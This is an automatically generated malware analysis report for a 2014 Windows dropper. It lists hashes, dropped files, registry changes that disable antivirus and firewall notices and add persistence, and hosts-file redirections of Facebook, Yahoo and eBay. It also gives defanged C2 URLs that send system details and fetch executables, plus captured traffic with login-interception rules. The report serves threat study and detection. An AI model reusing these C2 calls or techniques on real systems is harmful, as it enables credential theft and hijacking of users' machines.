Gen.Variant.Kazy.164619_40379e7014

by malwarelabrobot on May 24th, 2014 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Kazy.164619 (B) (Emsisoft), Gen:Variant.Kazy.164619 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour:


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 40379e70144f47ab9b9862a466dd0367
SHA1: f24a30759898b5277a2d4f1887332031d44b5eb5
SHA256: 1e9156cacf429e2b36be59f986229390f389b277a5ba7dea961d1a28986621b9
SSDeep: 24576:qWbZqPJHHA6XEP8XH1Iz z7ak6y1w0Kxjwr:qWbQu6UP8XSKz QRs
Size: 859136 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-16 00:19:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

manmps2pohkzu4.exe:6060
manmps1us2kzu4.exe:4980
hweynoxcrj.exe:3148
hweynoxcrj.exe:4308
manmps1tunkzu4rilnmw.exe:2484
manmps32eekzu4.exe:4484
hiovbxkmtrdw.exe:3796
hiovbxkmtrdw.exe:2392
%original file name%.exe:536

The Malware injects its code into the following process(es):
No processes have been created.

File activity

The process manmps2pohkzu4.exe:6060 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process hweynoxcrj.exe:3148 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\rng (60 bytes)
%WinDir%\Temp\manmps32eekzu4.exe (35 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\yervcmzvvvzjvyg\cfg (325 bytes)
%System%\yervcmzvvvzjvyg\tst (10 bytes)
%System%\yervcmzvvvzjvyg\run (10 bytes)
%System%\hiovbxkmtrdw.exe (6841 bytes)
%System%\yervcmzvvvzjvyg\por (1 bytes)
%WinDir%\Temp\manmps2pohkzu4.exe (6841 bytes)
%WinDir%\Temp\manmps1us2kzu4.exe (35 bytes)
%System%\yervcmzvvvzjvyg\ihst (224 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\manmps2pohkzu4.exe (0 bytes)
%WinDir%\Temp\manmps1us2kzu4.exe (0 bytes)
%WinDir%\Temp\manmps32eekzu4.exe (0 bytes)

The process hweynoxcrj.exe:4308 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process manmps1tunkzu4rilnmw.exe:2484 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\etc (10 bytes)
%System%\yervcmzvvvzjvyg\tst (10 bytes)
%System%\hweynoxcrj.exe (6841 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process hiovbxkmtrdw.exe:3796 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process hiovbxkmtrdw.exe:2392 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)

The process %original file name%.exe:536 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\yervcmzvvvzjvyg\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\manmps1tunkzu4rilnmw.exe (6300 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\manmps1tunkzu4rilnmw.exe (0 bytes)

Registry activity

The process manmps2pohkzu4.exe:6060 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 D7 26 85 49 1B 9C E4 4D AE 1D 9B 25 0B F8 75"

The process manmps1us2kzu4.exe:4980 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 91 CA 4D BA 8D D3 D2 1A DA 0D 8B 91 86 C9 CA"

The process hweynoxcrj.exe:3148 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 A0 D5 FF C5 FB 79 78 AF 9F 02 5B 60 51 01 A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process manmps1tunkzu4rilnmw.exe:2484 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 BC 7B 99 8E DA 3A B4 E2 E7 42 FD 14 37 8B ED"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Netlogon Smart Parental Foundation" = "%System%\hweynoxcrj.exe"

The process manmps32eekzu4.exe:4484 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 4B 87 F6 27 81 A6 4E 97 11 E5 1E DC 01 C5 C3"

Dropped PE files

MD5 File path
476f447617f65eebf35c52d4fd3b3188 c:\WINDOWS\Temp\manmps32eekzu4.exe

HOSTS file anomalies

The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 www.facebook.com
127.0.0.1 facebook.com
127.0.0.1 mail.yahoo.com
127.0.0.1 my.ebay.com
127.0.0.1 cgi.ebay.com
127.0.0.1 offer.ebay.com
127.0.0.1 feedback.ebay.com
127.0.0.1 motors.search.ebay.com
127.0.0.1 search.ebay.com
127.0.0.1 pages.ebay.com
127.0.0.1 pages.motors.ebay.com
127.0.0.1 myworld.ebay.com
127.0.0.1 motors.listings.ebay.com
127.0.0.1 cgi1.ebay.com
127.0.0.1 contact.ebay.com
127.0.0.1 srx.ebaymotors.ebayrtm.com
127.0.0.1 motors.shop.ebay.com
127.0.0.1 forums.ebay.com
127.0.0.1 answercenter.ebay.com
127.0.0.1 shop.ebay.com
127.0.0.1 ocs.ebay.com
127.0.0.1 cschatlb-na.corp.ebay.com
127.0.0.1 cschat1-na.corp.ebay.com
127.0.0.1 cschat.ebay.com
127.0.0.1 helpdesk.corp.ebay.com
127.0.0.1 qu.corp.ebay.com
127.0.0.1 www.ebay.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 679878 679936 4.70837 9eb5b1c585b3d9c82eaa9065e485ca27
.rdata 684032 52424 52736 3.65191 2cd9100ed1242de4caa92b99c9aa1032
.data 737280 159132 125440 5.49867 867dfd094ee749b6945fb73a580e472c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://stickmarch.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://tablefruit.net/dep/win64mroclient.exe 98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=dep&noxor&file=win64mroclient.exe&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://spendstudy.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 98.139.135.198
hxxp://requireneither.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://spendstudy.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://throughcountry.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://spendstudy.net/forum/search.php?method=dep&noxor&file=win64mroclient.exe&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://glasshealth.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://spendstudy.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://middleevery.net/dep/win64mroclient.exe 98.139.135.198
hxxp://mightglossary.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://gentlefriend.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 208.91.197.241
hxxp://spendstudy.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /dep/win64mroclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net


HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Fri, 23 May 2014 09:56:25 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28
<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="
text/html;charset=utf-8" >..<!-- Title -->.<TITLE>.Yaho
o! - 999 Unable to process request at this time -- error 999.</TITL
E>.<!---------------->..<style>./* nn4 hide */ ./*/*/.b
ody {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;te
xt-align:center;}table {font-size:inherit;font:x-small;}.html>body 
{font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100
%;vertical-align:middle;}p, form {margin:0;padding:0;}.p {padding-bott
om:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px
 solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:5
3px}.#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;pa
dding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;wi
dth:75%;margin:0 auto 20px;}.h1 {font-size:135%;text-align:center;marg
in:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;paddi
ng:.8em 0 .8em 4.5em;}.form {position:relative;background:#eee;margin-
bottom:15px;border:1px solid #ccc;border-width:1px 0;}.#s1p {width:15e
m;margin-right:.1em;}.form span {position:absolute;left:70%;top:.8em;}
form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-spa
ce:nowrap;background: url(hXXp://us.i1.yimg.com/us.yimg.com/i/s/bullet
.gif) no-repeat left center;} .form .sep {display:none;}.more {text-al
ign:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {te
xt-align:center;font:78% arial;}./* end nn4 hide */.</style>
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: glasshealth.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=103
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://glasshealth.net/?fp=SJuVHjBYqdt2YwKBJIS
a8zfMCgyzsvJCAKAju9IPhkQLlab/xfgbiVGbHzhi+P3FZvVSsOAo0Viby+llCD9
w+w==&prvtof=HaRCNgQw61cY9As/RwqRHoYCll5I0FG2Q17lH0qT5FQ=&po
ru=uDlDzfCmONJ23imZZ8SW5Td1fQ9K6UE0LjAwPstM+C/68GvzQIlKtSGWuQRc1bu
QerQ8QtOjdwNLNq414BloVwa2U+IUcDy0E61CUVmEJmgNWQYbrYOpkjsuUawcANRF&ci
fr=1&method=validate&mode=sox&v=028&sox=3b93ce05";.../*..-->..<s
cript type="text/javascript">...<!--...dimensionUpdated = 0;...f
unction applyFrameKiller()...{....if(window.top != self)....{.....cHei
ght = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {...../
/Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;...
..} else if( document.documentElement && ( document.documentElement.cl
ientWidth || document.documentElement.clientHeight )  ) {.....//IE 6  
in 'standards compliant mode'.....cHeight = document.documentElement.c
lientHeight;.....dimensionUpdated = 1;.....} else if( document.body &&
 ( document.body.clientWidth || document.body.clientHeight ) ) {...../
/IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensi
onUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 
1).....{......window.top.location = "hXXp://glasshealth.net/?fp=SJuVHj
BYqdt2YwKBJISa8zfMCgyzsvJCAKAju9IPhkQLlab/xfgbiVGbHzhi+P3FZvVSsOAo
0Viby+llCD9w+w==&prvtof=toeFkJJh/L32oytbO0D2psz9Y5wNfN8hqgdA
/yJo2yE=&poru=y3I78VSWrh2RfTE6ZTsuJZgESlq1if9TqEMNyzQmHifqiX4qzrAo
ckEhcThG71goC8t1C6ftFpK0QElCCA1NGrAh+2e2B65kk4ja6IRhOIrZ+ZxPZX
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: gentlefriend.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2603
Keep-Alive: timeout=5, max=119
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://gentlefriend.net/?fp=NREzS1yJjslzN1QArs
ReiXJkn5qn4twYtpliRRd5IezMtgVmNXeTDDNH+rO9Q6VfC4uH5D81TAUr0ISJHS+R
NA==&prvtof=paf3tDsUIlmm3WLswHjLx/8pBAR/ETuWlzW0N67sRCQ=&por
u=3mI3JC0m7+DIZVL98Buo8OA8VrVIEYGj5YrlOwz+7P3OSDQdW2d/mYfW4F8gxh
YGWwV5ruaPhGnG9Z5XjKvFVgdyRY77cgOanLMy3sbxSmAN4XC6Psl3CQzrWostiIVA&cif
r=1&method=validate&mode=sox&v=028&sox=3b93ce05";.../*..-->..<sc
ript type="text/javascript">...<!--...dimensionUpdated = 0;...fu
nction applyFrameKiller()...{....if(window.top != self)....{.....cHeig
ht = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//
Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;....
.} else if( document.documentElement && ( document.documentElement.cli
entWidth || document.documentElement.clientHeight )  ) {.....//IE 6  i
n 'standards compliant mode'.....cHeight = document.documentElement.cl
ientHeight;.....dimensionUpdated = 1;.....} else if( document.body && 
( document.body.clientWidth || document.body.clientHeight ) ) {.....//
IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensio
nUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1
).....{......window.top.location = "hXXp://gentlefriend.net/?fp=NREzS1
yJjslzN1QArsReiXJkn5qn4twYtpliRRd5IezMtgVmNXeTDDNH+rO9Q6VfC4uH5D81TA
Ur0ISJHS+RNA==&prvtof=2oc4h/dFATAy3KBD5DdEz51piEw3IgfQdtRnlAZQ
hGE=&poru=lqwN8wZl+lEp5i/OQFBrUnTzSYe6ChJeOyH1f30cLxo63h2f0QhbrW
2SNNA9B0v6kR1XhUvTjvobfd1LbnTzAydzDzdB3BTd+9FSw95RL0MpkgHrELTIso
<<< skipped >>>


GET /forum/search.php?method=dep&noxor&file=win64mroclient.exe&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 502 Cannot find server.
Date: Fri, 23 May 2014 09:56:25 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>
;.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetic
a,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 
Final//EN"><html><head><style>a:link {font:8pt/11
pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style><meta HTTP-EQUIV="Content-Type" Content="text-html; c
harset=Windows-1252"><title>Cannot find server</title>&
lt;/head><body bgcolor="white"><table width="400" cellpadd
ing="3" cellspacing="5"><tr><td id="tableProps2" align="le
ft" valign="middle" width="360"><h1 id="textSection1"style="COLO
R: black; FONT: 13pt/15pt verdana"><span id="errorText">The p
age cannot be displayed</span></h1></td></tr>&
lt;tr><td id="tablePropsWidth" width="400" colspan="2"><fo
nt style="COLOR: black; FONT: 8pt/11pt verdana">The page you are lo
oking for is currently unavailable. The Web site might be experiencing
 technical difficulties, or you may need to adjust your browser settin
gs.</font></td></tr><tr><td id="tablePropsW
idth" width="400" colspan="2"><font id="LID1"style="COLOR: black
; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p i
d="LID2">Please try the following:</p><ul><li id="in
structionsText1">Click the Refresh button, or try again later.</
li><li id="instructionsText2"> If you typed the page addr
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net


HTTP/1.0 503 Service Temporarily Unavailable
Date: Fri, 23 May 2014 09:55:46 GMT
Content-Type: text/html; charset=iso-8859-1
Age: 0
Server: YTS/1.20.28
<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>503 - 
Service Unavailable..



GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: requireneither.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2635
Keep-Alive: timeout=5, max=101
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://requireneither.net/?fp=+hl/I26eexZh
trVmUuQExCIdEmf540L3TS9vGT3+A1uxccoi8+8Uuho/3tP5XPXmiZztYIfx2v90
TOQIxU1IcQ==&prvtof=KiWi7WvttXjiAy+QH8kac0Cjzg+Cs7PHl2W5KJtUru
8=&poru=pF3sJGLToz5lBcJPoguZO1797WGKNFAtLMLWM56TMC2T9gxp1QLsbnbuIXFz
rDENN2fiDt9mLaXr0I91e0a9BK4UsqD66ntXlQC0Lbae+AbNKV5dbA7R/GngH8YwsG
vP&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce05";.../*..-->..
<script type="text/javascript">...<!--...dimensionUpdated = 0
;...function applyFrameKiller()...{....if(window.top != self)....{....
.cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.
....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 
1;.....} else if( document.documentElement && ( document.documentEleme
nt.clientWidth || document.documentElement.clientHeight )  ) {.....//I
E 6  in 'standards compliant mode'.....cHeight = document.documentElem
ent.clientHeight;.....dimensionUpdated = 1;.....} else if( document.bo
dy && ( document.body.clientWidth || document.body.clientHeight ) ) {.
....//IE 4 compatible.....cHeight = document.body.clientHeight;.....di
mensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdate
d == 1).....{......window.top.location = "hXXp://requireneither.net/?f
p=+hl/I26eexZhtrVmUuQExCIdEmf540L3TS9vGT3+A1uxccoi8+8Uuho/3t
P5XPXmiZztYIfx2v90TOQIxU1IcQ==&prvtof=NXAUJ0jRM5M1ncy8a9rod6hCL6h%
2FxvIvEV8NfNkj/w8=&poru=TxpHEu8ibwG1gUo8nkcMDgNUMjp1KB+/EuCGfu
3iHQgL2QNG10feUwjqqIaiCx2DhysxPrBKRGay0bFKq+FIdi4qKFLI+VnCUSq1
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: stickmarch.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:46 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2595
Keep-Alive: timeout=5, max=105
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=xbgW8nvpfLZNAzRjgLCv
7odAY395EryqsJrx4FkbQPb076XGOh7d0LTtao9EO8IMWti3WIyY4GynN33MdHGlgw=%
3D&prvtof=ifTypRrRcy/ARVAt3Zx9yMC1z879aRtsJextNO5RemU=&poru=AZTylM
45ftq9lF4GRlrQ4hQR8EnwupmfeHOPhPnwH3Zc07kyBCSk6QCPRZVDxaAGArMNRrdPtusa
1EaLeb9x9UayCQj7O4YpCHw595j2xp5C24ehEIQWQblDx7TPj5ZP&cifr=1&method=val
idate&mode=sox&v=028&sox=3b93ce05";.../*..-->..<script type="tex
t/javascript">...<!--...dimensionUpdated = 0;...function applyFr
ameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if
( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHe
ight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( do
cument.documentElement && ( document.documentElement.clientWidth || do
cument.documentElement.clientHeight )  ) {.....//IE 6  in 'standards c
ompliant mode'.....cHeight = document.documentElement.clientHeight;...
..dimensionUpdated = 1;.....} else if( document.body && ( document.bod
y.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatibl
e.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.
....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......w
indow.top.location = "hXXp://stickmarch.net/?fp=xbgW8nvpfLZNAzRjgLCv7o
dAY395EryqsJrx4FkbQPb076XGOh7d0LTtao9EO8IMWti3WIyY4GynN33MdHGlgw==
&prvtof=5zdZe7bdjP5jMzx+qLIZ+N78t9e0pQg0PZS6dFlfRYs=&poru=5kioIr
6zLhiYW6RomV4YbG9+f6FPRlsLkBqy4taC0ARXN13wDFrXTPtMKpCPG/vocc5ISNa4
wXvAK9Q4YPRX/wW1bn8MD/cuJ2KC11ejLR5BGpQIPay3LMjY35v1qgNA&cifr=
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 200 OK
Date: Fri, 23 May 2014 09:56:21 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
304.W..S........spendstudy.net............e{$ImB.N(......DY.IR..<.s
..CZ.[ ...^<C....rn..,..j{............=x.'..w%|.,.....E-.)5iZ......
...M..Ti.Hyo.tG..F...2fyl=..Ee...'..&.Xs.U....T....q.W. .....y......:.
..Nu......X.s~.T.....4.3..Q.c..2..F.bf..p....Y64..Y..L.......k6...LP/.
H..c%T.?...y.HbM..RZ. .t..P3.d......T...71...!.o..*<.~..X.nca.y.tE.
Q..^........3@L....@.^.~.!.Z..=.,...]..i...~.....(.$}.-....e.kVH:zS...
..M..$...h.z%.".4..K.-..y[p^y[....j0....C.../.=......g.pB...&(,.....f.
J.... ..&..g...........X./.9...,.4...g....Kh.Y..k.p.....1......s[j.[.#
....:...tEj.I..I_g..... ......?........a.n..t..6.'..e.$A..U.P.........
...}.h....U... ...!-....Pd.........?D.I.'..jQ.`._..4s1.#.P?.%(.^hx..&.
.... ....5u...........*,-kk'....2...................)...X.&.1?.Q.../49
...D..'$e..p\.S......Y.........r..Q...3....oc.n89.SI2{#..Y|.vQ}2.(H.:.
.....T..T..Pf..^.G..{.Jz1....g.V.6_&...|.J.....h......:.R"*9.....z..\.
...}B..n..}..2..|{...I.........kv......n&3".."...8.z..q.....b4..B...-0
....Q#4..."E2..i.M:>8..4...Um...t|...*O..#...z5?.:"....u.....-...~.
J.b...........w.s.....:..,..2...T|....~SvcN.?...e-...V...$(T.t@.....".
4.....yIm.......\...... 4....._.Ia.B....[..~I..3l.3.0...d.S<..0ne..
h..n..Z...%?$G....



GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 200 OK
Date: Fri, 23 May 2014 09:56:22 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28
ping.5.FLAG cfg.115."signarmy.net" "wifeknew.net" "groupcook.net" "wat
chstand.net" "saltsecond.net" "southblood.net" "lasopeidres.com" var_u
ser_ip.585.%kill_jhminer% = "1";.%invite_cc% = "1";.ºn_contact% = "1
";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=
6bcd406e63c8bb5b98d7d6963df64775&talk=1";.ëaylive% = "middleevery.ne
t";.%set_intercepts% = ""VVV.facebook.com" "middleevery.net" "/fb_logi
n/" "/login/" "1" "facebook.com" "middleevery.net" "/fb_login/" "/logi
